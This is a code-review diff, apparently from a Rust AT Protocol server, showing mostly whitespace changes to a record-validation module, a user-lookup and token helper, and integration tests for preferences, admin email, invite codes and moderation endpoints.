.fetch_optional(db) 40 .await? 41 .ok_or(DbLookupError::NotFound) 42 } 43 + 44 pub struct UserInfo { 45 pub id: Uuid, 46 pub did: String, 47 pub handle: String, 48 } 49 + 50 pub async fn get_user_by_did(db: &PgPool, did: &str) -> Result<UserInfo, DbLookupError> { 51 sqlx::query_as!( 52 UserInfo, ··· 57 .await? 58 .ok_or(DbLookupError::NotFound) 59 } 60 + 61 pub async fn get_user_by_identifier(db: &PgPool, identifier: &str) -> Result<UserInfo, DbLookupError> { 62 sqlx::query_as!( 63 UserInfo, ··· 68 .await? 69 .ok_or(DbLookupError::NotFound) 70 } 71 + 72 #[cfg(test)] 73 mod tests { 74 use super::*; 75 + 76 #[test] 77 fn test_generate_token_code() { 78 let code = generate_token_code(); 79 assert_eq!(code.len(), 11); 80 assert!(code.contains('-')); 81 + 82 let parts: Vec<&str> = code.split('-').collect(); 83 assert_eq!(parts.len(), 2); 84 assert_eq!(parts[0].len(), 5); 85 assert_eq!(parts[1].len(), 5); 86 + 87 for c in code.chars() { 88 if c != '-' { 89 assert!(BASE32_ALPHABET.contains(c)); 90 } 91 } 92 } 93 + 94 #[test] 95 fn test_generate_token_code_parts() { 96 let code = generate_token_code_parts(3, 4); 97 let parts: Vec<&str> = code.split('-').collect(); 98 assert_eq!(parts.len(), 3); 99 + 100 for part in parts { 101 assert_eq!(part.len(), 4); 102 }
+30
src/validation/mod.rs
··· 1 use serde_json::Value; 2 use thiserror::Error; 3 #[derive(Debug, Error)] 4 pub enum ValidationError { 5 #[error("No $type provided")] ··· 17 #[error("Unknown record type: {0}")] 18 UnknownType(String), 19 } 20 #[derive(Debug, Clone, Copy, PartialEq, Eq)] 21 pub enum ValidationStatus { 22 Valid, 23 Unknown, 24 Invalid, 25 } 26 pub struct RecordValidator { 27 require_lexicon: bool, 28 } 29 impl Default for RecordValidator { 30 fn default() -> Self { 31 Self::new() 32 } 33 } 34 impl RecordValidator { 35 pub fn new() -> Self { 36 Self { 37 require_lexicon: false, 38 } 39 } 40 pub fn require_lexicon(mut self, require: bool) -> Self { 41 self.require_lexicon = require; 42 self 43 } 44 pub fn validate( 45 &self, 46 record: &Value, ··· 83 } 84 Ok(ValidationStatus::Valid) 85 } 86 fn validate_post(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 87 if !obj.contains_key("text") { 88 return Err(ValidationError::MissingField("text".to_string())); ··· 127 } 128 Ok(()) 129 } 130 fn validate_profile(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 131 if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) { 132 let grapheme_count = display_name.chars().count(); ··· 148 } 149 Ok(()) 150 } 151 fn validate_like(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 152 if !obj.contains_key("subject") { 153 return Err(ValidationError::MissingField("subject".to_string())); ··· 158 self.validate_strong_ref(obj.get("subject"), "subject")?; 159 Ok(()) 160 } 161 fn validate_repost(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 162 if !obj.contains_key("subject") { 163 return Err(ValidationError::MissingField("subject".to_string())); ··· 168 self.validate_strong_ref(obj.get("subject"), "subject")?; 169 Ok(()) 170 } 171 fn validate_follow(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 172 if !obj.contains_key("subject") { 173 return Err(ValidationError::MissingField("subject".to_string())); ··· 185 } 186 Ok(()) 187 } 188 fn validate_block(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 189 if !obj.contains_key("subject") { 190 return Err(ValidationError::MissingField("subject".to_string())); ··· 202 } 203 Ok(()) 204 } 205 fn validate_list(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 206 if !obj.contains_key("name") { 207 return Err(ValidationError::MissingField("name".to_string())); ··· 222 } 223 Ok(()) 224 } 225 fn validate_list_item(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 226 if !obj.contains_key("subject") { 227 return Err(ValidationError::MissingField("subject".to_string())); ··· 234 } 235 Ok(()) 236 } 237 fn validate_feed_generator(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 238 if !obj.contains_key("did") { 239 return Err(ValidationError::MissingField("did".to_string())); ··· 254 } 255 Ok(()) 256 } 257 fn validate_threadgate(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 258 if !obj.contains_key("post") { 259 return Err(ValidationError::MissingField("post".to_string())); ··· 263 } 264 Ok(()) 265 } 266 fn validate_labeler_service(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 267 if !obj.contains_key("policies") { 268 return Err(ValidationError::MissingField("policies".to_string())); ··· 272 } 273 Ok(()) 274 } 275 fn validate_strong_ref(&self, value: Option<&Value>, path: &str) -> Result<(), ValidationError> { 276 let obj = value 277 .and_then(|v| v.as_object()) ··· 296 Ok(()) 297 } 298 } 299 fn validate_datetime(value: &str, path: &str) -> Result<(), ValidationError> { 300 if chrono::DateTime::parse_from_rfc3339(value).is_err() { 301 return Err(ValidationError::InvalidDatetime { ··· 304 } 305 Ok(()) 306 } 307 pub fn validate_record_key(rkey: &str) -> Result<(), ValidationError> { 308 if rkey.is_empty() { 309 return Err(ValidationError::InvalidRecord("Record key cannot be empty".to_string())); ··· 324 } 325 Ok(()) 326 } 327 pub fn validate_collection_nsid(collection: &str) -> Result<(), ValidationError> { 328 if collection.is_empty() { 329 return Err(ValidationError::InvalidRecord("Collection NSID cannot be empty".to_string())); ··· 348 } 349 Ok(()) 350 } 351 #[cfg(test)] 352 mod tests { 353 use super::*; 354 use serde_json::json; 355 #[test] 356 fn test_validate_post() { 357 let validator = RecordValidator::new(); ··· 365 ValidationStatus::Valid 366 ); 367 } 368 #[test] 369 fn test_validate_post_missing_text() { 370 let validator = RecordValidator::new(); ··· 374 }); 375 assert!(validator.validate(&invalid_post, "app.bsky.feed.post").is_err()); 376 } 377 #[test] 378 fn test_validate_type_mismatch() { 379 let validator = RecordValidator::new(); ··· 385 let result = validator.validate(&record, "app.bsky.feed.post"); 386 assert!(matches!(result, Err(ValidationError::TypeMismatch { .. }))); 387 } 388 #[test] 389 fn test_validate_unknown_type() { 390 let validator = RecordValidator::new(); ··· 397 ValidationStatus::Unknown 398 ); 399 } 400 #[test] 401 fn test_validate_unknown_type_strict() { 402 let validator = RecordValidator::new().require_lexicon(true); ··· 407 let result = validator.validate(&record, "com.example.custom"); 408 assert!(matches!(result, Err(ValidationError::UnknownType(_)))); 409 } 410 #[test] 411 fn test_validate_record_key() { 412 assert!(validate_record_key("valid-key_123").is_ok()); ··· 416 assert!(validate_record_key("").is_err()); 417 assert!(validate_record_key("invalid/key").is_err()); 418 } 419 #[test] 420 fn test_validate_collection_nsid() { 421 assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
··· 1 use serde_json::Value; 2 use thiserror::Error; 3 + 4 #[derive(Debug, Error)] 5 pub enum ValidationError { 6 #[error("No $type provided")] ··· 18 #[error("Unknown record type: {0}")] 19 UnknownType(String), 20 } 21 + 22 #[derive(Debug, Clone, Copy, PartialEq, Eq)] 23 pub enum ValidationStatus { 24 Valid, 25 Unknown, 26 Invalid, 27 } 28 + 29 pub struct RecordValidator { 30 require_lexicon: bool, 31 } 32 + 33 impl Default for RecordValidator { 34 fn default() -> Self { 35 Self::new() 36 } 37 } 38 + 39 impl RecordValidator { 40 pub fn new() -> Self { 41 Self { 42 require_lexicon: false, 43 } 44 } 45 + 46 pub fn require_lexicon(mut self, require: bool) -> Self { 47 self.require_lexicon = require; 48 self 49 } 50 + 51 pub fn validate( 52 &self, 53 record: &Value, ··· 90 } 91 Ok(ValidationStatus::Valid) 92 } 93 + 94 fn validate_post(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 95 if !obj.contains_key("text") { 96 return Err(ValidationError::MissingField("text".to_string())); ··· 135 } 136 Ok(()) 137 } 138 + 139 fn validate_profile(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 140 if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) { 141 let grapheme_count = display_name.chars().count(); ··· 157 } 158 Ok(()) 159 } 160 + 161 fn validate_like(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 162 if !obj.contains_key("subject") { 163 return Err(ValidationError::MissingField("subject".to_string())); ··· 168 self.validate_strong_ref(obj.get("subject"), "subject")?; 169 Ok(()) 170 } 171 + 172 fn validate_repost(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 173 if !obj.contains_key("subject") { 174 return Err(ValidationError::MissingField("subject".to_string())); ··· 179 self.validate_strong_ref(obj.get("subject"), "subject")?; 180 Ok(()) 181 } 182 + 183 fn validate_follow(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 184 if !obj.contains_key("subject") { 185 return Err(ValidationError::MissingField("subject".to_string())); ··· 197 } 198 Ok(()) 199 } 200 + 201 fn validate_block(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 202 if !obj.contains_key("subject") { 203 return Err(ValidationError::MissingField("subject".to_string())); ··· 215 } 216 Ok(()) 217 } 218 + 219 fn validate_list(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 220 if !obj.contains_key("name") { 221 return Err(ValidationError::MissingField("name".to_string())); ··· 236 } 237 Ok(()) 238 } 239 + 240 fn validate_list_item(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 241 if !obj.contains_key("subject") { 242 return Err(ValidationError::MissingField("subject".to_string())); ··· 249 } 250 Ok(()) 251 } 252 + 253 fn validate_feed_generator(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 254 if !obj.contains_key("did") { 255 return Err(ValidationError::MissingField("did".to_string())); ··· 270 } 271 Ok(()) 272 } 273 + 274 fn validate_threadgate(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 275 if !obj.contains_key("post") { 276 return Err(ValidationError::MissingField("post".to_string())); ··· 280 } 281 Ok(()) 282 } 283 + 284 fn validate_labeler_service(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 285 if !obj.contains_key("policies") { 286 return Err(ValidationError::MissingField("policies".to_string())); ··· 290 } 291 Ok(()) 292 } 293 + 294 fn validate_strong_ref(&self, value: Option<&Value>, path: &str) -> Result<(), ValidationError> { 295 let obj = value 296 .and_then(|v| v.as_object()) ··· 315 Ok(()) 316 } 317 } 318 + 319 fn validate_datetime(value: &str, path: &str) -> Result<(), ValidationError> { 320 if chrono::DateTime::parse_from_rfc3339(value).is_err() { 321 return Err(ValidationError::InvalidDatetime { ··· 324 } 325 Ok(()) 326 } 327 + 328 pub fn validate_record_key(rkey: &str) -> Result<(), ValidationError> { 329 if rkey.is_empty() { 330 return Err(ValidationError::InvalidRecord("Record key cannot be empty".to_string())); ··· 345 } 346 Ok(()) 347 } 348 + 349 pub fn validate_collection_nsid(collection: &str) -> Result<(), ValidationError> { 350 if collection.is_empty() { 351 return Err(ValidationError::InvalidRecord("Collection NSID cannot be empty".to_string())); ··· 370 } 371 Ok(()) 372 } 373 + 374 #[cfg(test)] 375 mod tests { 376 use super::*; 377 use serde_json::json; 378 + 379 #[test] 380 fn test_validate_post() { 381 let validator = RecordValidator::new(); ··· 389 ValidationStatus::Valid 390 ); 391 } 392 + 393 #[test] 394 fn test_validate_post_missing_text() { 395 let validator = RecordValidator::new(); ··· 399 }); 400 assert!(validator.validate(&invalid_post, "app.bsky.feed.post").is_err()); 401 } 402 + 403 #[test] 404 fn test_validate_type_mismatch() { 405 let validator = RecordValidator::new(); ··· 411 let result = validator.validate(&record, "app.bsky.feed.post"); 412 assert!(matches!(result, Err(ValidationError::TypeMismatch { .. }))); 413 } 414 + 415 #[test] 416 fn test_validate_unknown_type() { 417 let validator = RecordValidator::new(); ··· 424 ValidationStatus::Unknown 425 ); 426 } 427 + 428 #[test] 429 fn test_validate_unknown_type_strict() { 430 let validator = RecordValidator::new().require_lexicon(true); ··· 435 let result = validator.validate(&record, "com.example.custom"); 436 assert!(matches!(result, Err(ValidationError::UnknownType(_)))); 437 } 438 + 439 #[test] 440 fn test_validate_record_key() { 441 assert!(validate_record_key("valid-key_123").is_ok()); ··· 445 assert!(validate_record_key("").is_err()); 446 assert!(validate_record_key("invalid/key").is_err()); 447 } 448 + 449 #[test] 450 fn test_validate_collection_nsid() { 451 assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
+11
tests/actor.rs
··· 1 mod common; 2 use common::{base_url, client, create_account_and_login}; 3 use serde_json::{json, Value}; 4 #[tokio::test] 5 async fn test_get_preferences_empty() { 6 let client = client(); ··· 17 assert!(body.get("preferences").is_some()); 18 assert!(body["preferences"].as_array().unwrap().is_empty()); 19 } 20 #[tokio::test] 21 async fn test_get_preferences_no_auth() { 22 let client = client(); ··· 28 .unwrap(); 29 assert_eq!(resp.status(), 401); 30 } 31 #[tokio::test] 32 async fn test_put_preferences_success() { 33 let client = client(); ··· 70 assert!(adult_pref.is_some()); 71 assert_eq!(adult_pref.unwrap()["enabled"], true); 72 } 73 #[tokio::test] 74 async fn test_put_preferences_no_auth() { 75 let client = client(); ··· 85 .unwrap(); 86 assert_eq!(resp.status(), 401); 87 } 88 #[tokio::test] 89 async fn test_put_preferences_missing_type() { 90 let client = client(); ··· 108 let body: Value = resp.json().await.unwrap(); 109 assert_eq!(body["error"], "InvalidRequest"); 110 } 111 #[tokio::test] 112 async fn test_put_preferences_invalid_namespace() { 113 let client = client(); ··· 132 let body: Value = resp.json().await.unwrap(); 133 assert_eq!(body["error"], "InvalidRequest"); 134 } 135 #[tokio::test] 136 async fn test_put_preferences_read_only_rejected() { 137 let client = client(); ··· 156 let body: Value = resp.json().await.unwrap(); 157 assert_eq!(body["error"], "InvalidRequest"); 158 } 159 #[tokio::test] 160 async fn test_put_preferences_replaces_all() { 161 let client = client(); ··· 208 assert_eq!(prefs_arr.len(), 1); 209 assert_eq!(prefs_arr[0]["$type"], "app.bsky.actor.defs#threadViewPref"); 210 } 211 #[tokio::test] 212 async fn test_put_preferences_saved_feeds() { 213 let client = client(); ··· 249 assert_eq!(saved_feeds["$type"], "app.bsky.actor.defs#savedFeedsPrefV2"); 250 assert!(saved_feeds["items"].as_array().unwrap().len() == 1); 251 } 252 #[tokio::test] 253 async fn test_put_preferences_muted_words() { 254 let client = client(); ··· 286 let prefs_arr = body["preferences"].as_array().unwrap(); 287 assert_eq!(prefs_arr[0]["$type"], "app.bsky.actor.defs#mutedWordsPref"); 288 } 289 #[tokio::test] 290 async fn test_preferences_isolation_between_users() { 291 let client = client();
··· 1 mod common; 2 use common::{base_url, client, create_account_and_login}; 3 use serde_json::{json, Value}; 4 + 5 #[tokio::test] 6 async fn test_get_preferences_empty() { 7 let client = client(); ··· 18 assert!(body.get("preferences").is_some()); 19 assert!(body["preferences"].as_array().unwrap().is_empty()); 20 } 21 + 22 #[tokio::test] 23 async fn test_get_preferences_no_auth() { 24 let client = client(); ··· 30 .unwrap(); 31 assert_eq!(resp.status(), 401); 32 } 33 + 34 #[tokio::test] 35 async fn test_put_preferences_success() { 36 let client = client(); ··· 73 assert!(adult_pref.is_some()); 74 assert_eq!(adult_pref.unwrap()["enabled"], true); 75 } 76 + 77 #[tokio::test] 78 async fn test_put_preferences_no_auth() { 79 let client = client(); ··· 89 .unwrap(); 90 assert_eq!(resp.status(), 401); 91 } 92 + 93 #[tokio::test] 94 async fn test_put_preferences_missing_type() { 95 let client = client(); ··· 113 let body: Value = resp.json().await.unwrap(); 114 assert_eq!(body["error"], "InvalidRequest"); 115 } 116 + 117 #[tokio::test] 118 async fn test_put_preferences_invalid_namespace() { 119 let client = client(); ··· 138 let body: Value = resp.json().await.unwrap(); 139 assert_eq!(body["error"], "InvalidRequest"); 140 } 141 + 142 #[tokio::test] 143 async fn test_put_preferences_read_only_rejected() { 144 let client = client(); ··· 163 let body: Value = resp.json().await.unwrap(); 164 assert_eq!(body["error"], "InvalidRequest"); 165 } 166 + 167 #[tokio::test] 168 async fn test_put_preferences_replaces_all() { 169 let client = client(); ··· 216 assert_eq!(prefs_arr.len(), 1); 217 assert_eq!(prefs_arr[0]["$type"], "app.bsky.actor.defs#threadViewPref"); 218 } 219 + 220 #[tokio::test] 221 async fn test_put_preferences_saved_feeds() { 222 let client = client(); ··· 258 assert_eq!(saved_feeds["$type"], "app.bsky.actor.defs#savedFeedsPrefV2"); 259 assert!(saved_feeds["items"].as_array().unwrap().len() == 1); 260 } 261 + 262 #[tokio::test] 263 async fn test_put_preferences_muted_words() { 264 let client = client(); ··· 296 let prefs_arr = body["preferences"].as_array().unwrap(); 297 assert_eq!(prefs_arr[0]["$type"], "app.bsky.actor.defs#mutedWordsPref"); 298 } 299 + 300 #[tokio::test] 301 async fn test_preferences_isolation_between_users() { 302 let client = client();
+8
tests/admin_email.rs
··· 1 mod common; 2 use reqwest::StatusCode; 3 use serde_json::{json, Value}; 4 use sqlx::PgPool; 5 async fn get_pool() -> PgPool { 6 let conn_str = common::get_db_connection_string().await; 7 sqlx::postgres::PgPoolOptions::new() ··· 10 .await 11 .expect("Failed to connect to test database") 12 } 13 #[tokio::test] 14 async fn test_send_email_success() { 15 let client = common::client(); ··· 45 assert_eq!(notification.subject.as_deref(), Some("Test Admin Email")); 46 assert!(notification.body.contains("Hello, this is a test email from the admin.")); 47 } 48 #[tokio::test] 49 async fn test_send_email_default_subject() { 50 let client = common::client(); ··· 79 assert!(notification.subject.is_some()); 80 assert!(notification.subject.unwrap().contains("Message from")); 81 } 82 #[tokio::test] 83 async fn test_send_email_recipient_not_found() { 84 let client = common::client(); ··· 99 let body: Value = res.json().await.expect("Invalid JSON"); 100 assert_eq!(body["error"], "AccountNotFound"); 101 } 102 #[tokio::test] 103 async fn test_send_email_missing_content() { 104 let client = common::client(); ··· 119 let body: Value = res.json().await.expect("Invalid JSON"); 120 assert_eq!(body["error"], "InvalidRequest"); 121 } 122 #[tokio::test] 123 async fn test_send_email_missing_recipient() { 124 let client = common::client(); ··· 139 let body: Value = res.json().await.expect("Invalid JSON"); 140 assert_eq!(body["error"], "InvalidRequest"); 141 } 142 #[tokio::test] 143 async fn test_send_email_requires_auth() { 144 let client = common::client();
··· 1 mod common; 2 + 3 use reqwest::StatusCode; 4 use serde_json::{json, Value}; 5 use sqlx::PgPool; 6 + 7 async fn get_pool() -> PgPool { 8 let conn_str = common::get_db_connection_string().await; 9 sqlx::postgres::PgPoolOptions::new() ··· 12 .await 13 .expect("Failed to connect to test database") 14 } 15 + 16 #[tokio::test] 17 async fn test_send_email_success() { 18 let client = common::client(); ··· 48 assert_eq!(notification.subject.as_deref(), Some("Test Admin Email")); 49 assert!(notification.body.contains("Hello, this is a test email from the admin.")); 50 } 51 + 52 #[tokio::test] 53 async fn test_send_email_default_subject() { 54 let client = common::client(); ··· 83 assert!(notification.subject.is_some()); 84 assert!(notification.subject.unwrap().contains("Message from")); 85 } 86 + 87 #[tokio::test] 88 async fn test_send_email_recipient_not_found() { 89 let client = common::client(); ··· 104 let body: Value = res.json().await.expect("Invalid JSON"); 105 assert_eq!(body["error"], "AccountNotFound"); 106 } 107 + 108 #[tokio::test] 109 async fn test_send_email_missing_content() { 110 let client = common::client(); ··· 125 let body: Value = res.json().await.expect("Invalid JSON"); 126 assert_eq!(body["error"], "InvalidRequest"); 127 } 128 + 129 #[tokio::test] 130 async fn test_send_email_missing_recipient() { 131 let client = common::client(); ··· 146 let body: Value = res.json().await.expect("Invalid JSON"); 147 assert_eq!(body["error"], "InvalidRequest"); 148 } 149 + 150 #[tokio::test] 151 async fn test_send_email_requires_auth() { 152 let client = common::client();
+12
tests/admin_invite.rs
··· 1 mod common; 2 use common::*; 3 use reqwest::StatusCode; 4 use serde_json::{Value, json}; 5 #[tokio::test] 6 async fn test_admin_get_invite_codes_success() { 7 let client = client(); ··· 32 let body: Value = res.json().await.expect("Response was not valid JSON"); 33 assert!(body["codes"].is_array()); 34 } 35 #[tokio::test] 36 async fn test_admin_get_invite_codes_with_limit() { 37 let client = client(); ··· 65 let codes = body["codes"].as_array().unwrap(); 66 assert!(codes.len() <= 2); 67 } 68 #[tokio::test] 69 async fn test_admin_get_invite_codes_no_auth() { 70 let client = client(); ··· 78 .expect("Failed to send request"); 79 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 80 } 81 #[tokio::test] 82 async fn test_disable_account_invites_success() { 83 let client = client(); ··· 113 let body: Value = res.json().await.expect("Response was not valid JSON"); 114 assert_eq!(body["error"], "InvitesDisabled"); 115 } 116 #[tokio::test] 117 async fn test_enable_account_invites_success() { 118 let client = client(); ··· 158 .expect("Failed to send request"); 159 assert_eq!(res.status(), StatusCode::OK); 160 } 161 #[tokio::test] 162 async fn test_disable_account_invites_no_auth() { 163 let client = client(); ··· 175 .expect("Failed to send request"); 176 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 177 } 178 #[tokio::test] 179 async fn test_disable_account_invites_not_found() { 180 let client = client(); ··· 194 .expect("Failed to send request"); 195 assert_eq!(res.status(), StatusCode::NOT_FOUND); 196 } 197 #[tokio::test] 198 async fn test_disable_invite_codes_by_code() { 199 let client = client(); ··· 242 assert!(disabled_code.is_some()); 243 assert_eq!(disabled_code.unwrap()["disabled"], true); 244 } 245 #[tokio::test] 246 async fn test_disable_invite_codes_by_account() { 247 let client = client(); ··· 289 assert_eq!(code["disabled"], true); 290 } 291 } 292 #[tokio::test] 293 async fn test_disable_invite_codes_no_auth() { 294 let client = client(); ··· 306 .expect("Failed to send request"); 307 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 308 } 309 #[tokio::test] 310 async fn test_admin_enable_account_invites_not_found() { 311 let client = client();
··· 1 mod common; 2 + 3 use common::*; 4 use reqwest::StatusCode; 5 use serde_json::{Value, json}; 6 + 7 #[tokio::test] 8 async fn test_admin_get_invite_codes_success() { 9 let client = client(); ··· 34 let body: Value = res.json().await.expect("Response was not valid JSON"); 35 assert!(body["codes"].is_array()); 36 } 37 + 38 #[tokio::test] 39 async fn test_admin_get_invite_codes_with_limit() { 40 let client = client(); ··· 68 let codes = body["codes"].as_array().unwrap(); 69 assert!(codes.len() <= 2); 70 } 71 + 72 #[tokio::test] 73 async fn test_admin_get_invite_codes_no_auth() { 74 let client = client(); ··· 82 .expect("Failed to send request"); 83 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 84 } 85 + 86 #[tokio::test] 87 async fn test_disable_account_invites_success() { 88 let client = client(); ··· 118 let body: Value = res.json().await.expect("Response was not valid JSON"); 119 assert_eq!(body["error"], "InvitesDisabled"); 120 } 121 + 122 #[tokio::test] 123 async fn test_enable_account_invites_success() { 124 let client = client(); ··· 164 .expect("Failed to send request"); 165 assert_eq!(res.status(), StatusCode::OK); 166 } 167 + 168 #[tokio::test] 169 async fn test_disable_account_invites_no_auth() { 170 let client = client(); ··· 182 .expect("Failed to send request"); 183 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 184 } 185 + 186 #[tokio::test] 187 async fn test_disable_account_invites_not_found() { 188 let client = client(); ··· 202 .expect("Failed to send request"); 203 assert_eq!(res.status(), StatusCode::NOT_FOUND); 204 } 205 + 206 #[tokio::test] 207 async fn test_disable_invite_codes_by_code() { 208 let client = client(); ··· 251 assert!(disabled_code.is_some()); 252 assert_eq!(disabled_code.unwrap()["disabled"], true); 253 } 254 + 255 #[tokio::test] 256 async fn test_disable_invite_codes_by_account() { 257 let client = client(); ··· 299 assert_eq!(code["disabled"], true); 300 } 301 } 302 + 303 #[tokio::test] 304 async fn test_disable_invite_codes_no_auth() { 305 let client = client(); ··· 317 .expect("Failed to send request"); 318 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 319 } 320 + 321 #[tokio::test] 322 async fn test_admin_enable_account_invites_not_found() { 323 let client = client();
+10
tests/admin_moderation.rs
··· 1 mod common; 2 use common::*; 3 use reqwest::StatusCode; 4 use serde_json::{Value, json}; 5 #[tokio::test] 6 async fn test_get_subject_status_user_success() { 7 let client = client(); ··· 22 assert_eq!(body["subject"]["$type"], "com.atproto.admin.defs#repoRef"); 23 assert_eq!(body["subject"]["did"], did); 24 } 25 #[tokio::test] 26 async fn test_get_subject_status_not_found() { 27 let client = client(); ··· 40 let body: Value = res.json().await.expect("Response was not valid JSON"); 41 assert_eq!(body["error"], "SubjectNotFound"); 42 } 43 #[tokio::test] 44 async fn test_get_subject_status_no_param() { 45 let client = client(); ··· 57 let body: Value = res.json().await.expect("Response was not valid JSON"); 58 assert_eq!(body["error"], "InvalidRequest"); 59 } 60 #[tokio::test] 61 async fn test_get_subject_status_no_auth() { 62 let client = client(); ··· 71 .expect("Failed to send request"); 72 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 73 } 74 #[tokio::test] 75 async fn test_update_subject_status_takedown_user() { 76 let client = client(); ··· 115 assert_eq!(status_body["takedown"]["applied"], true); 116 assert_eq!(status_body["takedown"]["ref"], "mod-action-123"); 117 } 118 #[tokio::test] 119 async fn test_update_subject_status_remove_takedown() { 120 let client = client(); ··· 171 let status_body: Value = status_res.json().await.unwrap(); 172 assert!(status_body["takedown"].is_null() || !status_body["takedown"]["applied"].as_bool().unwrap_or(false)); 173 } 174 #[tokio::test] 175 async fn test_update_subject_status_deactivate_user() { 176 let client = client(); ··· 209 assert!(status_body["deactivated"].is_object()); 210 assert_eq!(status_body["deactivated"]["applied"], true); 211 } 212 #[tokio::test] 213 async fn test_update_subject_status_invalid_type() { 214 let client = client(); ··· 236 let body: Value = res.json().await.expect("Response was not valid JSON"); 237 assert_eq!(body["error"], "InvalidRequest"); 238 } 239 #[tokio::test] 240 async fn test_update_subject_status_no_auth() { 241 let client = client();
··· 1 mod common; 2 + 3 use common::*; 4 use reqwest::StatusCode; 5 use serde_json::{Value, json}; 6 + 7 #[tokio::test] 8 async fn test_get_subject_status_user_success() { 9 let client = client(); ··· 24 assert_eq!(body["subject"]["$type"], "com.atproto.admin.defs#repoRef"); 25 assert_eq!(body["subject"]["did"], did); 26 } 27 + 28 #[tokio::test] 29 async fn test_get_subject_status_not_found() { 30 let client = client(); ··· 43 let body: Value = res.json().await.expect("Response was not valid JSON"); 44 assert_eq!(body["error"], "SubjectNotFound"); 45 } 46 + 47 #[tokio::test] 48 async fn test_get_subject_status_no_param() { 49 let client = client(); ··· 61 let body: Value = res.json().await.expect("Response was not valid JSON"); 62 assert_eq!(body["error"], "InvalidRequest"); 63 } 64 + 65 #[tokio::test] 66 async fn test_get_subject_status_no_auth() { 67 let client = client(); ··· 76 .expect("Failed to send request"); 77 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 78 } 79 + 80 #[tokio::test] 81 async fn test_update_subject_status_takedown_user() { 82 let client = client(); ··· 121 assert_eq!(status_body["takedown"]["applied"], true); 122 assert_eq!(status_body["takedown"]["ref"], "mod-action-123"); 123 } 124 + 125 #[tokio::test] 126 async fn test_update_subject_status_remove_takedown() { 127 let client = client(); ··· 178 let status_body: Value = status_res.json().await.unwrap(); 179 assert!(status_body["takedown"].is_null() || !status_body["takedown"]["applied"].as_bool().unwrap_or(false)); 180 } 181 + 182 #[tokio::test] 183 async fn test_update_subject_status_deactivate_user() { 184 let client = client(); ··· 217 assert!(status_body["deactivated"].is_object()); 218 assert_eq!(status_body["deactivated"]["applied"], true); 219 } 220 + 221 #[tokio::test] 222 async fn test_update_subject_status_invalid_type() { 223 let client = client(); ··· 245 let body: Value = res.json().await.expect("Response was not valid JSON"); 246 assert_eq!(body["error"], "InvalidRequest"); 247 } 248 + 249 #[tokio::test] 250 async fn test_update_subject_status_no_auth() { 251 let client = client();
+6
tests/appview_integration.rs
··· 1 mod common; 2 use common::{base_url, client, create_account_and_login}; 3 use reqwest::StatusCode; 4 use serde_json::{json, Value}; 5 #[tokio::test] 6 async fn test_get_author_feed_returns_appview_data() { 7 let client = client(); ··· 27 "Post text should match appview response" 28 ); 29 } 30 #[tokio::test] 31 async fn test_get_actor_likes_returns_appview_data() { 32 let client = client(); ··· 52 "Post text should match appview response" 53 ); 54 } 55 #[tokio::test] 56 async fn test_get_post_thread_returns_appview_data() { 57 let client = client(); ··· 80 "Post text should match appview response" 81 ); 82 } 83 #[tokio::test] 84 async fn test_get_feed_returns_appview_data() { 85 let client = client(); ··· 105 "Post text should match appview response" 106 ); 107 } 108 #[tokio::test] 109 async fn test_register_push_proxies_to_appview() { 110 let client = client();
··· 1 mod common; 2 + 3 use common::{base_url, client, create_account_and_login}; 4 use reqwest::StatusCode; 5 use serde_json::{json, Value}; 6 + 7 #[tokio::test] 8 async fn test_get_author_feed_returns_appview_data() { 9 let client = client(); ··· 29 "Post text should match appview response" 30 ); 31 } 32 + 33 #[tokio::test] 34 async fn test_get_actor_likes_returns_appview_data() { 35 let client = client(); ··· 55 "Post text should match appview response" 56 ); 57 } 58 + 59 #[tokio::test] 60 async fn test_get_post_thread_returns_appview_data() { 61 let client = client(); ··· 84 "Post text should match appview response" 85 ); 86 } 87 + 88 #[tokio::test] 89 async fn test_get_feed_returns_appview_data() { 90 let client = client(); ··· 110 "Post text should match appview response" 111 ); 112 } 113 + 114 #[tokio::test] 115 async fn test_register_push_proxies_to_appview() { 116 let client = client();
+17
tests/common/mod.rs
